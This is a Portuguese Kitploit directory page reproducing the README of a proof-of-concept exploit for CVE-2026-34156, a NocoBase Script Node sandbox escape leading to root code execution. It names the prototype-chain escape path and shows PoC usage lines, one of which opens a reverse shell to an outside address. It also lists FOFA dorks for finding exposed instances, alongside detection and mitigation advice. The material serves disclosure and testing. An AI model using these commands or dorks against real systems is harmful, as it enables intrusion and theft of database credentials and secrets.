Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-34156 — CVE-2026-34156 | Kitploit
Ferramentas/GitHubGitHub/0xblackash/cve-2026-34156
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e Educação
GitHub0xblackash/cve-2026-34156

CVE-2026-34156

CVE-2026-34156

Ver Repositório
2há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2026-34156 - Escape Crítico de Sandbox no NocoBase

ChatGPT Image Apr 3, 2026, 01_32_16 PM Critical CVSS 9.9 Exploit Public

Execução Remota de Código como Root sem Autenticação / com Privilégios Baixos no NocoBase


📌 Visão Geral

CVE-2026-34156 é uma vulnerabilidade crítica de escape de sandbox no NocoBase (uma plataforma open-source no-code/low-code).

Um atacante com a capacidade de criar ou executar um Workflow Script Node (mesmo com privilégios baixos) pode escapar da sandbox vm do Node.js e alcançar Execução Remota de Código completa como root dentro do contêiner.

Versões Afetadas

  • NocoBase < 2.0.28

Corrigido Em

  • NocoBase 2.0.28 (lançado em março de 2026)
Baixar ferramenta

🛠 Detalhes da Vulnerabilidade

  • Componente: @nocobase/plugin-workflow-javascript (Script Node)
  • Tipo: Escape de Sandbox via console._stdout.constructor.constructor
  • Impacto:
    • Execução Remota de Código como root (uid=0)
    • Execução de comandos arbitrários
    • Acesso ao sistema de arquivos (fs)
    • Vazamento de variáveis de ambiente (credenciais de banco de dados, segredos)
    • Comprometimento total do contêiner

Causa Raiz

O objeto console passado para a sandbox é do realm do host, permitindo que atacantes escalem a cadeia de protótipos e acessem o construtor real Function → process.mainModule.require.


🚀 Exploit

Prova de Conceito (PoC)

root@kitploit:~
# Simple command execution
python3 CVE-2026-34156.py -u https://target.com -e [email protected] -p password -c "id"

# Reverse shell
python3 CVE-2026-34156.py -u https://target.com -r 192.168.1.100:4444

O repositório inclui: Script PoC completo, template Nuclei e verificador seguro.


🧪 Detecção

Template Nuclei

root@kitploit:~
nuclei -u https://target -t cves/CVE-2026-34156.yaml

Dorks do FOFA

root@kitploit:~
title="NocoBase" || title="Sign in - NocoBase"
title="NocoBase" && body="workflow"

🛡️ Mitigação

  1. Atualize imediatamente para o NocoBase 2.0.28 ou versões mais recentes.
  2. Desative o Workflow Script Node para usuários não confiáveis.
  3. Execute os contêineres do NocoBase como usuário não-root.
  4. Use sandboxing mais forte (ex.: isolated-vm) em produção.

📸 Capturas de Tela

cve-2026-34156

⚠️ Aviso Legal

Este repositório é somente para fins educacionais e de pesquisa de segurança autorizada.
Use apenas em sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar.

Exploração não autorizada é ilegal.


⭐ Créditos e Referências

  • Descoberta: Desconhecido (Divulgação pública)
  • Correção: Equipe de Segurança do NocoBase
  • NVD: CVE-2026-34156
  • Advisory do GitHub: GHSA-px3p-vgh9-m57c

Feito com ❤️ para a comunidade de segurança
Fique seguro. Atualize rápido.